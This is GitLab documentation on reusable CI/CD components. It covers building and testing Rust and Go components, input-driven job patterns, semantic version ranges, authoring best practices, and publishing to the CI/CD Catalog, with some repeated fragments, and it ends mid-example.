$CI_SERVER_FQDN/$CI_PROJECT_PATH/format@$CI_COMMIT_SHA - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/build@$CI_COMMIT_SHA - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/build@$CI_COMMIT_SHA inputs: golang_version: "1.21" - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/test@$CI_COMMIT_SHA inputs: golang_version: latest ``` 1. Add Go source code to test the CI/CD component. The `go` commands expect a Go project with `go.mod` and `main.go` in the root directory. - Initialize the Go modules. Modify the URL for your CI/CD component path. ```shell go mod init example.gitlab.com/components/golang ``` - Create a `main.go` file with a main function, printing `Hello, CI/CD component` for example. You can use code comments to generate Go code using [GitLab Duo Code Suggestions](../../user/project/repository/code_suggestions/_index.md). ```go // Specify the package, import required packages // Create a main function // Inside the main function, print "Hello, CI/CD Component" package main import "fmt" func main() { fmt.Println("Hello, CI/CD Component") } ``` - The directory tree should look as follows: ```plaintext tree . ├── LICENSE.md ├── README.md ├── go.mod ├── main.go └── templates ├── build.yml ├── format.yml └── test.yml ``` Follow the remaining steps in the [converting a CI/CD template into a component](_index.md#convert-a-cicd-template-to-a-component) section to complete the migration: 1. Commit and push the changes, and verify the CI/CD pipeline results. 1. Follow the guidance on [writing a component](_index.md#write-a-component) to update the `README.md` and `LICENSE.md` files. 1. [Release the component](_index.md#publish-a-new-release) and verify it in the CI/CD catalog. 1. Add the CI/CD component into your staging/production environment. The [GitLab-maintained Go component](https://gitlab.com/components/go) provides an example for a successful migration from a Go CI/CD template, enhanced with inputs and component best practices. You can inspect the Git history to learn more.
--- stage: Verify group: Pipeline Authoring info: This page is maintained by Developer Relations, author @dnsmichi, see https://handbook.gitlab.com/handbook/marketing/developer-relations/developer-advocacy/content/#maintained-documentation title: CI/CD component examples breadcrumbs: - doc - ci - components --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} ## Test a component Depending on a component's functionality, [testing the component](_index.md#test-the-component) might require additional files in the repository. For example, a component which lints, builds, and tests software in a specific programming language requires actual source code samples. You can have source code examples, configuration files, and similar in the same repository. For example, the Code Quality CI/CD component's has several [code samples for testing](https://gitlab.com/components/code-quality/-/tree/main/src). ### Example: Test a Rust language CI/CD component Depending on a component's functionality, [testing the component](_index.md#test-the-component) might require additional files in the repository. The following "hello world" example for the Rust programming language uses the `cargo` tool chain for simplicity: 1. Go to the CI/CD component root directory. 1. Initialize a new Rust project by using the `cargo init` command. ```shell cargo init ``` The command creates all required project files, including a `src/main.rs` "hello world" example. This step is sufficient to build the Rust source code in a component job with `cargo build`. ```plaintext tree . ├── Cargo.toml ├── LICENSE.md ├── README.md ├── src │ └── main.rs └── templates └── build.yml ``` 1. Ensure that the component has a job to build the Rust source code, for example, in `templates/build.yml`: ```yaml spec: inputs: stage: default: build description: 'Defines the build stage' rust_version: default: latest description: 'Specify the Rust version, use values from https://hub.docker.com/_/rust/tags Defaults to latest' --- "build-$[[ inputs.rust_version ]]": stage: $[[ inputs.stage ]] image: rust:$[[ inputs.rust_version ]] script: - cargo build --verbose ``` In this example: - The `stage` and `rust_version` inputs can be modified from their default values. The CI/CD job starts with a `build-` prefix and dynamically creates the name based on the `rust_version` input. The command `cargo build --verbose` compiles the Rust source code. 1. Test the component's `build` template in the project's `.gitlab-ci.yml` configuration file: ```yaml include: # include the component located in the current project from the current SHA - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/build@$CI_COMMIT_SHA inputs: stage: build stages: [build, test, release] ``` 1. For running tests and more, add additional functions and tests into the Rust code, and add a component template and job running `cargo test` in `templates/test.yml`. ```yaml spec: inputs: stage: default: test description: 'Defines the test stage' rust_version: default: latest description: 'Specify the Rust version, use values from https://hub.docker.com/_/rust/tags Defaults to latest' --- "test-$[[ inputs.rust_version ]]": stage: $[[ inputs.stage ]] image: rust:$[[ inputs.rust_version ]] script: - cargo test --verbose ``` 1. Test the additional job in the pipeline by including the `test` component template: ```yaml include: # include the component located in the current project from the current SHA - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/build@$CI_COMMIT_SHA inputs: stage: build - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/test@$CI_COMMIT_SHA inputs: stage: test stages: [build, test, release] ``` ## CI/CD component patterns This section provides practical examples of implementing common patterns in CI/CD components. ### Use boolean inputs to conditionally configure jobs You can compose jobs with two conditionals by combining `boolean` type inputs and [`extends`](../yaml/_index.md#extends) functionality. For example, to configure complex caching behavior with a `boolean` input: ```yaml spec: inputs: enable_special_caching: description: 'If set to `true` configures a complex caching behavior' type: boolean --- .my-component:enable_special_caching:false: extends: null .my-component:enable_special_caching:true: cache: policy: pull-push key: $CI_COMMIT_SHA paths: [...] my-job: extends: '.my-component:enable_special_caching:$[[ inputs.enable_special_caching ]]' script: ... # run some fancy tooling ``` This pattern works by passing the `enable_special_caching` input into the `extends` keyword of the job. Depending on whether `enable_special_caching` is `true` or `false`, the appropriate configuration is selected from the predefined hidden jobs (`.my-component:enable_special_caching:true` or `.my-component:enable_special_caching:false`). ### Use `options` to conditionally configure jobs You can compose jobs with multiple options, for behavior similar to `if` and `elseif` conditionals. Use the [`extends`](../yaml/_index.md#extends) with `string` type and multiple `options` for any number of conditions. For example, to configure complex caching behavior with 3 different options: ```yaml spec: inputs: cache_mode: description: Defines the caching mode to use for this component type: string options: - default - aggressive - relaxed --- .my-component:cache_mode:default: extends: null .my-component:cache_mode:aggressive: cache: policy: push key: $CI_COMMIT_SHA paths: ['*/**'] .my-component:cache_mode:relaxed: cache: policy: pull-push key: $CI_COMMIT_BRANCH paths: ['bin/*'] my-job: extends: '.my-component:cache_mode:$[[ inputs.cache_mode ]]' script: ... # run some fancy tooling ``` In this example, `cache_mode` input offers `default`, `aggressive`, and `relaxed` options, each corresponding to a different hidden job. By extending the component job with `extends: '.my-component:cache_mode:$[[ inputs.cache_mode ]]'`, the job dynamically inherits the correct caching configuration based on the selected option. ## CI/CD component migration examples This section shows practical examples of migrating CI/CD templates and pipeline configuration into reusable CI/CD components. ### CI/CD component migration example: Go A complete pipeline for the software development lifecycle can be composed with multiple jobs and stages. CI/CD templates for programming languages may provide multiple jobs in a single template file. As a practice, the following Go CI/CD template should be migrated. ```yaml default: image: golang:latest stages: - test - build - deploy format: stage: test script: - go fmt $(go list ./... | grep -v /vendor/) - go vet $(go list ./... | grep -v /vendor/) - go test -race $(go list ./... | grep -v /vendor/) compile: stage: build script: - mkdir -p mybinaries - go build -o mybinaries ./... artifacts: paths: - mybinaries ``` {{< alert type="note" >}} For a more incremental approach, migrate one job at a time. Start with the `build` job, then repeat the steps for the `format` and `test` jobs. {{< /alert >}} The CI/CD template migration involves the following steps: 1. Analyze the CI/CD jobs and dependencies, and define migration actions: - The `image` configuration is global, [needs to be moved into the job definitions](_index.md#avoid-using-global-keywords). - The `format` job runs multiple `go` commands in one job. The `go test` command should be moved into a separate job to increase pipeline efficiency. - The `compile` job runs `go build` and should be renamed to `build`. 1. Define optimization strategies for better pipeline efficiency. - The `stage` job attribute should be configurable to allow different CI/CD pipeline consumers. - The `image` key uses a hardcoded image tag `latest`. Add [`golang_version` as input](../inputs/_index.md) with `latest` as default value for more flexible and reusable pipelines. The input must match the Docker Hub image tag values. - The `compile` job builds the binaries into a hard-coded target directory `mybinaries`, which can be enhanced with a dynamic [input](../inputs/_index.md) and default value `mybinaries`. 1. Create a template [directory structure](_index.md#directory-structure) for the new component, based on one template for each job. - The name of the template should follow the `go` command, for example `format.yml`, `build.yml`, and `test.yml`. - Create a new project, initialize a Git repository, add/commit all changes, set a remote origin and push. Modify the URL for your CI/CD component project path. - Create additional files as outlined in the guidance to [write a component](_index.md#write-a-component): `README.md`, `LICENSE.md`, `.gitlab-ci.yml`, `.gitignore`. The following shell commands initialize the Go component structure: ```shell git init mkdir templates touch templates/{format,build,test}.yml touch README.md LICENSE.md .gitlab-ci.yml .gitignore git add -A git commit -avm "Initial component structure" git remote add origin https://gitlab.example.com/components/golang.git git push ``` 1. Create the CI/CD jobs as template. Start with the `build` job. - Define the following inputs in the `spec` section: `stage`, `golang_version` and `binary_directory`. - Add a dynamic job name definition, accessing `inputs.golang_version`. - Use the similar pattern for dynamic Go image versions, accessing `inputs.golang_version`. - Assign the stage to the `inputs.stage` value. - Create the binary director from `inputs.binary_directory` and add it as parameter to `go build`. - Define the artifacts path to `inputs.binary_directory`. ```yaml spec: inputs: stage: default: 'build' description: 'Defines the build stage' golang_version: default: 'latest' description: 'Go image version tag' binary_directory: default: 'mybinaries' description: 'Output directory for created binary artifacts' --- "build-$[[ inputs.golang_version ]]": image: golang:$[[ inputs.golang_version ]] stage: $[[ inputs.stage ]] script: - mkdir -p $[[ inputs.binary_directory ]] - go build -o $[[ inputs.binary_directory ]] ./... artifacts: paths: - $[[ inputs.binary_directory ]] ``` - The `format` job template follows the same patterns, but only requires the `stage` and `golang_version` inputs. ```yaml spec: inputs: stage: default: 'format' description: 'Defines the format stage' golang_version: default: 'latest' description: 'Golang image version tag' --- "format-$[[ inputs.golang_version ]]": image: golang:$[[ inputs.golang_version ]] stage: $[[ inputs.stage ]] script: - go fmt $(go list ./... | grep -v /vendor/) - go vet $(go list ./... | grep -v /vendor/) ``` - The `test` job template follows the same patterns, but only requires the `stage` and `golang_version` inputs. ```yaml spec: inputs: stage: default: 'test' description: 'Defines the format stage' golang_version: default: 'latest' description: 'Golang image version tag' --- "test-$[[ inputs.golang_version ]]": image: golang:$[[ inputs.golang_version ]] stage: $[[ inputs.stage ]] script: - go test -race $(go list ./... | grep -v /vendor/) ``` 1. In order to test the component, modify the `.gitlab-ci.yml` configuration file, and add [tests](_index.md#test-the-component). - Specify a different value for `golang_version` as input for the `build` job. - Modify the URL for your CI/CD component path. ```yaml stages: [format, build, test] include: - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/format@$CI_COMMIT_SHA - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/build@$CI_COMMIT_SHA - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/build@$CI_COMMIT_SHA inputs: golang_version: "1.21" - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/test@$CI_COMMIT_SHA inputs: golang_version: latest ``` 1. Add Go source code to test the CI/CD component. The `go` commands expect a Go project with `go.mod` and `main.go` in the root directory. - Initialize the Go modules. Modify the URL for your CI/CD component path. ```shell go mod init example.gitlab.com/components/golang ``` - Create a `main.go` file with a main function, printing `Hello, CI/CD component` for example. You can use code comments to generate Go code using [GitLab Duo Code Suggestions](../../user/project/repository/code_suggestions/_index.md). ```go // Specify the package, import required packages // Create a main function // Inside the main function, print "Hello, CI/CD Component" package main import "fmt" func main() { fmt.Println("Hello, CI/CD Component") } ``` - The directory tree should look as follows: ```plaintext tree . ├── LICENSE.md ├── README.md ├── go.mod ├── main.go └── templates ├── build.yml ├── format.yml └── test.yml ``` Follow the remaining steps in the [converting a CI/CD template into a component](_index.md#convert-a-cicd-template-to-a-component) section to complete the migration: 1. Commit and push the changes, and verify the CI/CD pipeline results. 1. Follow the guidance on [writing a component](_index.md#write-a-component) to update the `README.md` and `LICENSE.md` files. 1. [Release the component](_index.md#publish-a-new-release) and verify it in the CI/CD catalog. 1. Add the CI/CD component into your staging/production environment. The [GitLab-maintained Go component](https://gitlab.com/components/go) provides an example for a successful migration from a Go CI/CD template, enhanced with inputs and component best practices. You can inspect the Git history to learn more.
https://docs.gitlab.com/ci/components
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/components
[ "doc", "ci", "components" ]
_index.md
Verify
Pipeline Authoring
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
CI/CD components
Reusable, versioned CI/CD components for pipelines.
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - Introduced as an [experimental feature](../../policy/development_stages_support.md#experiment) in GitLab 16.0, [with a flag](../../administration/feature_flags/_index.md) named `ci_namespace_catalog_experimental`. Disabled by default. - [Enabled on GitLab.com and GitLab Self-Managed](https://gitlab.com/groups/gitlab-org/-/epics/9897) in GitLab 16.2. - [Feature flag `ci_namespace_catalog_experimental` removed](https://gitlab.com/gitlab-org/gitlab/-/issues/394772) in GitLab 16.3. - [Moved](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/130824) to [beta](../../policy/development_stages_support.md#beta) in GitLab 16.6. - [Made generally available](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/134062) in GitLab 17.0. {{< /history >}} A CI/CD component is a reusable single pipeline configuration unit. Use components to create a small part of a larger pipeline, or even to compose a complete pipeline configuration. A component can be configured with [input parameters](../inputs/_index.md) for more dynamic behavior. CI/CD components are similar to the other kinds of [configuration added with the `include` keyword](../yaml/includes.md), but have several advantages: - Components can be listed in the [CI/CD Catalog](#cicd-catalog). - Components can be released and used with a specific version. - Multiple components can be defined in the same project and versioned together. Instead of creating your own components, you can also search for published components that have the functionality you need in the [CI/CD Catalog](#cicd-catalog). <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> For an introduction and hands-on examples, see [Efficient DevSecOps workflows with reusable CI/CD components](https://www.youtube.com/watch?v=-yvfSFKAgbA). <!-- Video published on 2024-01-22. DRI: Developer Relations, https://gitlab.com/groups/gitlab-com/marketing/developer-relations/-/epics/399 --> For common questions and additional support, see the [FAQ: GitLab CI/CD Catalog](https://about.gitlab.com/blog/2024/08/01/faq-gitlab-ci-cd-catalog/) blog post. ## Component project {{< history >}} - The maximum number of components per project [changed](https://gitlab.com/gitlab-org/gitlab/-/issues/436565) from 10 to 30 in GitLab 16.9. {{< /history >}} A component project is a GitLab project with a repository that hosts one or more components. All components in the project are versioned together, with a maximum of 30 components per project. If a component requires different versioning from other components, the component should be moved to a dedicated component project. ### Create a component project To create a component project, you must: 1. [Create a new project](../../user/project/_index.md#create-a-blank-project) with a `README.md` file: - Ensure the description gives a clear introduction to the component. - Optional. After the project is created, you can [add a project avatar](../../user/project/working_with_projects.md#add-a-project-avatar). Components published to the [CI/CD catalog](#cicd-catalog) use both the description and avatar when displaying the component project's summary. 1. Add a YAML configuration file for each component, following the [required directory structure](#directory-structure). For example: ```yaml spec: inputs: stage: default: test --- component-job: script: echo job 1 stage: $[[ inputs.stage ]] ``` You can [use the component](#use-a-component) immediately, but you might want to consider publishing the component to the [CI/CD catalog](#cicd-catalog). ### Directory structure The repository must contain: - A `README.md` Markdown file documenting the details of all the components in the repository. - A top level `templates/` directory that contains all the component configurations. In this directory: - For simple components, use single files ending in `.yml` for each component, like `templates/secret-detection.yml`. - For complex components, create subdirectories with a `template.yml` for each component, like `templates/secret-detection/template.yml`. Only the `template.yml` file is used by other projects using the component. Other files in these directories are not released with the component, but can be used for things like tests or building container images. {{< alert type="note" >}} Optionally, each component can also have its own `README.md` file that provides more detailed information, and can be linked from the top-level `README.md` file. This helps to provide a better overview of your component project and how to use it. {{< /alert >}} You should also: - Configure the project's `.gitlab-ci.yml` to [test the components](#test-the-component) and [release new versions](#publish-a-new-release). - Add a `LICENSE.md` file with a license of your choice that covers the usage of your component. For example the [MIT](https://opensource.org/license/mit) or [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0#apply) open source licenses. For example: - If the project contains a single component, the directory structure should be similar to: ```plaintext ├── templates/ │ └── my-component.yml ├── LICENSE.md ├── README.md └── .gitlab-ci.yml ``` - If the project contains multiple components, then the directory structure should be similar to: ```plaintext ├── templates/ │ ├── my-simple-component.yml │ └── my-complex-component/ │ ├── template.yml │ ├── Dockerfile │ └── test.sh ├── LICENSE.md ├── README.md └── .gitlab-ci.yml ``` In this example: - The `my-simple-component` component's configuration is defined in a single file. - The `my-complex-component` component's configuration contains multiple files in a directory. ## Use a component Prerequisites: If you are a member of a parent group that contains the current group or project: - You must have the minimum role set by the visibility level of the project's parent group. For example, you must have at least the Reporter role if a parent project is set to **Private**. To add a component to a project's CI/CD configuration, use the [`include: component`](../yaml/_index.md#includecomponent) keyword. The component reference is formatted as `<fully-qualified-domain-name>/<project-path>/<component-name>@<specific-version>`, for example: ```yaml include: - component: $CI_SERVER_FQDN/my-org/security-components/secret-detection@1.0.0 inputs: stage: build ``` In this example: - `$CI_SERVER_FQDN` is a [predefined variable](../variables/predefined_variables.md) for the fully qualified domain name (FQDN) matching the GitLab host. You can only reference components in the same GitLab instance as your project. - `my-org/security-components` is the full path of the project containing the component. - `secret-detection` is the component name that is defined as either a single file `templates/secret-detection.yml` or as a directory `templates/secret-detection/` containing a `template.yml`. - `1.0.0` is the [version](#component-versions) of the component. Pipeline configuration and component configuration are not processed independently. When a pipeline starts, any included component configuration [merges](../yaml/includes.md#merge-method-for-include) into the pipeline's configuration. If your pipeline and the component both contain configuration with the same name, they can interact in unexpected ways. For example, two jobs with the same name would merge together into a single job. Similarly, a component using `extends` for configuration with the same name as a job in your pipeline could extend the wrong configuration. Make sure your pipeline and the component do not share any configuration with the same name, unless you intend to [override](../yaml/includes.md#override-included-configuration-values) the component's configuration. To use GitLab.com components on a GitLab Self-Managed instance, you must [mirror the component project](#use-a-gitlabcom-component-on-gitlab-self-managed). {{< alert type="warning" >}} If a component requires the use of tokens, passwords, or other sensitive data to function, be sure to audit the component's source code to verify that the data is only used to perform actions that you expect and authorize. You should also use tokens and secrets with the minimum permissions, access, or scope required to complete the action. {{< /alert >}} ### Component versions In order of highest priority first, the component version can be: - A commit SHA, for example `e3262fdd0914fa823210cdb79a8c421e2cef79d8`. - A tag, for example: `1.0.0`. If a tag and commit SHA exist with the same name, the commit SHA takes precedence over the tag. Components released to the CI/CD Catalog should be tagged with a [semantic version](#semantic-versioning). - A branch name, for example `main`. If a branch and tag exist with the same name, the tag takes precedence over the branch. - `~latest`, which always points to the latest semantic version published in the CI/CD Catalog. Use `~latest` only if you want to use the absolute latest version at all times, which could include breaking changes. `~latest` does not include pre-releases, for example `1.0.1-rc`, which are not considered production-ready. You can use any version supported by the component, but using a version published to the CI/CD catalog is recommended. The version referenced with a commit SHA or branch name might not be published in the CI/CD catalog, but could be used for testing. #### Semantic version ranges {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/450835) in GitLab 16.11 {{< /history >}} When [referencing a CI/CD catalog component](#component-versions), you can use a special format to specify the latest [semantic version](#semantic-versioning) in a range. This approach offers significant benefits for both consumers and authors of components: - For users, using version ranges is an excellent way to automatically receive minor or patch updates without risking breaking changes from major releases. This ensures your pipelines stay up-to-date with the latest bug fixes and security patches while maintaining stability. - For component authors, the use of version ranges allows major version releases without risk of immediately breaking existing pipelines. Users who have specified version ranges continue to use the latest compatible minor or patch version, giving them time to update their pipelines at their own pace. To specify the latest release of: - A minor version, use both the major and minor version numbers in the reference, but not the patch version number. For example, use `1.1` to use the latest version that starts with `1.1`, including `1.1.0` or `1.1.9`, but not `1.2.0`. - A major version, use only the major version number in the reference. For example, use `1` to use the latest version that starts with `1.`, like `1.0.0` or `1.9.9`, but not `2.0.0`. - All versions, use `~latest` to use the latest released version. For example, a component is released in this exact order: 1. `1.0.0` 1. `1.1.0` 1. `2.0.0` 1. `1.1.1` 1. `1.2.0` 1. `2.1.0` 1. `2.0.1` In this example, referencing the component with: - `1` would use the `1.2.0` version. - `1.1` would use the `1.1.1` version. - `~latest` would use the `2.1.0` version. Pre-release versions are never fetched when referencing a version range. To fetch a pre-release version, specify the full version, for example `1.0.1-rc`. ## Write a component This section describes some best practices for creating high quality component projects. ### Manage dependencies While it's possible for a component to use other components in turn, make sure to carefully select the dependencies. To manage dependencies, you should: - Keep dependencies to a minimum. A small amount of duplication is usually better than having dependencies. - Rely on local dependencies whenever possible. For example, using [`include:local`](../yaml/_index.md#includelocal) is a good way to ensure the same Git SHA is used across multiple files. - When depending on components from other projects, pin their version to a release from the catalog rather than using moving target versions such as `~latest` or a Git reference. Using a release or Git SHA guarantees that you are fetching the same revision all the time and that consumers of your component get consistent behavior. - Update your dependencies regularly by pinning them to newer releases. Then publish a new release of your components with updated dependencies. - Evaluate the permissions of dependencies, and use dependencies that require the least amount of permissions. For example, if you need to build an image, consider using [Buildah](https://buildah.io/) instead of Docker, so that you don't require a Runner with a privileged Docker daemon. ### Write a clear `README.md` Each component project should have clear and comprehensive documentation. To write a good `README.md` file: - The documentation should start with a summary of the capabilities that the components in the project provide. - If the project contains multiple components, use a [table of contents](../../user/markdown.md#table-of-contents) to help users quickly jump to a specific component's details. - Add a `## Components` section with sub-sections like `### Component A` for each component in the project. - In each component section: - Add a description of what the component does. - Add at least one YAML example showing how to use it. - If the component uses inputs, add a table showing all inputs with name, description, type, and default value. - If the component uses any variables or secrets, those should be documented too. - A `## Contribute` section is recommended if contributions are welcome. If a component needs more instructions, add additional documentation in a Markdown file in the component directory and link to it from the main `README.md` file. For example: ```plaintext README.md # with links to the specific docs.md templates/ ├── component-1/ │ ├── template.yml │ └── docs.md └── component-2/ ├── template.yml └── docs.md ``` For an example of a component `README.md`, see the [Deploy to AWS with GitLab CI/CD component's `README.md`](https://gitlab.com/components/aws/-/blob/main/README.md). ### Test the component Testing CI/CD components as part of the development workflow is strongly recommended and helps ensure consistent behavior. Test changes in a CI/CD pipeline (like any other project) by creating a `.gitlab-ci.yml` in the root directory. Make sure to test both the behavior and potential side-effects of the component. You can use the [GitLab API](../../api/rest/_index.md) if needed. For example: ```yaml include: # include the component located in the current project from the current SHA - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/my-component@$CI_COMMIT_SHA inputs: stage: build stages: [build, test, release] # Check if `component job of my-component` is added. # This example job could also test that the included component works as expected. # You can inspect data generated by the component, use GitLab API endpoints, or third-party tools. ensure-job-added: stage: test image: badouralix/curl-jq # Replace "component job of my-component" with the job name in your component. script: - | route="${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/pipelines/${CI_PIPELINE_ID}/jobs" count=`curl --silent "$route" | jq 'map(select(.name | contains("component job of my-component"))) | length'` if [ "$count" != "1" ]; then exit 1; else echo "Component Job present" fi # If the pipeline is for a new tag with a semantic version, and all previous jobs succeed, # create the release. create-release: stage: release image: registry.gitlab.com/gitlab-org/release-cli:latest script: echo "Creating release $CI_COMMIT_TAG" rules: - if: $CI_COMMIT_TAG release: tag_name: $CI_COMMIT_TAG description: "Release $CI_COMMIT_TAG of components repository $CI_PROJECT_PATH" ``` After committing and pushing changes, the pipeline tests the component, then creates a release if the earlier jobs pass. {{< alert type="note" >}} Authentication is necessary if the project is private. {{< /alert >}} #### Test a component against sample files In some cases, components require source files to interact with. For example, a component that builds Go source code likely needs some samples of Go to test against. Alternatively, a component that builds Docker images likely needs some sample Dockerfiles to test against. You can include sample files like these directly in the component project, to be used during component testing. You can learn more in [examples for testing a component](examples.md#test-a-component). ### Avoid hard-coding instance or project-specific values When [using another component](#use-a-component) in your component, use `$CI_SERVER_FQDN` instead of your instance's Fully Qualified Domain Name (like `gitlab.com`). When accessing the GitLab API in your component, use the `$CI_API_V4_URL` instead of the full URL and path for your instance (like `https://gitlab.com/api/v4`). These [predefined variables](../variables/predefined_variables.md) ensure that your component also works when used on another instance, for example when using [a GitLab.com component on a GitLab Self-Managed instance](#use-a-gitlabcom-component-on-gitlab-self-managed). ### Do not assume API resources are always public Ensure that the component and its testing pipeline work also [on GitLab Self-Managed](#use-a-gitlabcom-component-on-gitlab-self-managed). While some API resources of public projects on GitLab.com could be accessed via unauthenticated requests on a GitLab Self-Managed instance a component project could be mirrored as private or internal project. It's important that an access token can optionally be provided via inputs or variables to authenticate requests on GitLab Self-Managed instances. ### Avoid using global keywords Avoid using [global keywords](../yaml/_index.md#global-keywords) in a component. Using these keywords in a component affects all jobs in a pipeline, including jobs directly defined in the main `.gitlab-ci.yml` or in other included components. As an alternative to global keywords: - Add the configuration directly to each job, even if it creates some duplication in the component configuration. - Use the [`extends`](../yaml/_index.md#extends) keyword in the component, but use unique names that reduce the risk of naming conflicts when the component is merged into the configuration. For example, avoid using the `default` global keyword: ```yaml # Not recommended default: image: ruby:3.0 rspec-1: script: bundle exec rspec dir1/ rspec-2: script: bundle exec rspec dir2/ ``` Instead, you can: - Add the configuration to each job explicitly: ```yaml rspec-1: image: ruby:3.0 script: bundle exec rspec dir1/ rspec-2: image: ruby:3.0 script: bundle exec rspec dir2/ ``` - Use `extends` to reuse configuration: ```yaml .rspec-image: image: ruby:3.0 rspec-1: extends: - .rspec-image script: bundle exec rspec dir1/ rspec-2: extends: - .rspec-image script: bundle exec rspec dir2/ ``` ### Replace hardcoded values with inputs Avoid using hardcoded values in CI/CD components. Hardcoded values might force component users to need to review the component's internal details and adapt their pipeline to work with the component. A common keyword with problematic hard-coded values is `stage`. If a component job's stage is hardcoded, all pipelines using the component **must** either define the exact same stage, or [override](../yaml/includes.md#override-included-configuration-values) the configuration. The preferred method is to use the [`input` keyword](../inputs/_index.md) for dynamic component configuration. The component user can specify the exact value they need. For example, to create a component with `stage` configuration that can be defined by users: - In the component configuration: ```yaml spec: inputs: stage: default: test --- unit-test: stage: $[[ inputs.stage ]] script: echo unit tests integration-test: stage: $[[ inputs.stage ]] script: echo integration tests ``` - In a project using the component: ```yaml stages: [verify, release] include: - component: $CI_SERVER_FQDN/myorg/ruby/test@1.0.0 inputs: stage: verify ``` #### Define job names with inputs Similar to the values for the `stage` keyword, you should avoid hard-coding job names in CI/CD components. When your component's users can customize job names, they can prevent conflicts with the existing names in their pipelines. Users could also include a component multiple times with different input options by using different names. Use `inputs` to allow your component's users to define a specific job name, or a prefix for the job name. For example: ```yaml spec: inputs: job-prefix: description: "Define a prefix for the job name" job-name: description: "Alternatively, define the job's name" job-stage: default: test --- "$[[ inputs.job-prefix ]]-scan-website": stage: $[[ inputs.job-stage ]] script: - scan-website-1 "$[[ inputs.job-name ]]": stage: $[[ inputs.job-stage ]] script: - scan-website-2 ``` ### Replace custom CI/CD variables with inputs When using CI/CD variables in a component, evaluate if the `inputs` keyword should be used instead. Avoid asking users to define custom variables to configure components when `inputs` is a better solution. Inputs are explicitly defined in the component's `spec` section, and have better validation than variables. For example, if a required input is not passed to the component, GitLab returns a pipeline error. By contrast, if a variable is not defined, its value is empty, and there is no error. For example, use `inputs` instead of variables to configure a scanner's output format: - In the component configuration: ```yaml spec: inputs: scanner-output: default: json --- my-scanner: script: my-scan --output $[[ inputs.scanner-output ]] ``` - In the project using the component: ```yaml include: - component: $CI_SERVER_FQDN/path/to/project/my-scanner@1.0.0 inputs: scanner-output: yaml ``` In other cases, CI/CD variables might still be preferred. For example: - Use [predefined variables](../variables/predefined_variables.md) to automatically configure a component to match a user's project. - Ask users to store sensitive values as [masked or protected CI/CD variables in project settings](../variables/_index.md#define-a-cicd-variable-in-the-ui). ## CI/CD Catalog {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/407249) as an [experiment](../../policy/development_stages_support.md#experiment) in GitLab 16.1. - [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/432045) to [beta](../../policy/development_stages_support.md#beta) in GitLab 16.7. - [Made Generally Available](https://gitlab.com/gitlab-org/gitlab/-/issues/454306) in GitLab 17.0. {{< /history >}} The [CI/CD Catalog](https://gitlab.com/explore/catalog) is a list of projects with published CI/CD components you can use to extend your CI/CD workflow. Anyone can [create a component project](#create-a-component-project) and add it to the CI/CD Catalog, or contribute to an existing project to improve the available components. For a click-through demo, see [the CI/CD Catalog beta Product Tour](https://gitlab.navattic.com/cicd-catalog). <!-- Demo published on 2024-01-24 --> ### View the CI/CD Catalog To access the CI/CD Catalog and view the published components that are available to you: 1. On the left sidebar, select **Search or go to**. 1. Select **Explore**. 1. Select **CI/CD Catalog**. Alternatively, if you are already in the [pipeline editor](../pipeline_editor/_index.md) in your project, you can select **CI/CD Catalog**. Visibility of components in the CI/CD catalog follows the component source project's [visibility setting](../../user/public_access.md). Components with source projects set to: - Private are visible only to users assigned at least the Guest role for the source component project. To use a component, you must have at least the Reporter role. - Internal are visible only to users logged into the GitLab instance. - Public are visible to anyone with access to the GitLab instance. ### Publish a component project To publish a component project in the CI/CD catalog, you must: 1. Set the project as a catalog project. 1. Publish a new release. #### Set a component project as a catalog project To make published versions of a component project visible in the CI/CD catalog, you must set the project as a catalog project. Prerequisites: - You must have the Owner role for the project. To set the project as a catalog project: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > General**. 1. Expand **Visibility, project features, permissions**. 1. Turn on the **CI/CD Catalog project** toggle. The project only becomes findable in the catalog after you publish a new release. To use automation to enable this setting, you can use the [`mutationcatalogresourcescreate`](../../api/graphql/reference/_index.md#mutationcatalogresourcescreate) GraphQL endpoint. [Issue 463043](https://gitlab.com/gitlab-org/gitlab/-/issues/463043) proposes to expose this in the REST API as well. #### Publish a new release CI/CD components can be [used](#use-a-component) without being listed in the CI/CD catalog. However, publishing a component's releases in the catalog makes it discoverable to other users. Prerequisites: - You must have at least the Maintainer role for the project. - The project must: - Be set as a [catalog project](#set-a-component-project-as-a-catalog-project). - Have a [project description](../../user/project/working_with_projects.md#edit-a-project) defined. - Have a `README.md` file in the root directory for the commit SHA of the tag being released. - Have at least one [CI/CD component in the `templates/` directory](#directory-structure) for the commit SHA of the tag being released. - You must use the [`release` keyword](../yaml/_index.md#release) in a CI/CD job to create the release, not the [Releases API](../../api/releases/_index.md#create-a-release). To publish a new version of the component to the catalog: 1. Add a job to the project's `.gitlab-ci.yml` file that uses the `release` keyword to create the new release when a tag is created. You should configure the tag pipeline to [test the components](#test-the-component) before running the release job. For example: ```yaml create-release: 